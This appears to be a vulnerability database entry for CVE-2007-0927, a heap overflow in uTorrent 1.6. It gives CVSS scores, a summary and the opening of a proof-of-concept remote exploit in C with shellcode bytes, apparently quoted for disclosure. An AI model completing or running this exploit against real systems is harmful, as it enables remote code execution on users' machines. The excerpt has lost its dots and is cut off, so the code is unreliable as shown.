7.5
CVSSv2

CVE-2007-0927

Published: 14/02/2007 Updated: 16/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Heap-based buffer overflow in uTorrent 1.6 allows remote malicious users to execute arbitrary code via a torrent file with a crafted announce header.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

utorrent utorrent 1.6

Exploits

/* * This is a PoC remote exploit for uTorrent 16 * * Author: * defsec <defacedsecurity@hotmailcom> * wwwdefacedsecuritycom * * * Works on XP SP1 and w2k sp1-4 * */ #include <stdioh> #include <stdlibh> #define NASIZE 4880 unsigned char nice_announce[NASIZE]; unsigned char xorops[]="\x33\xc0\x33\xdb"; / ...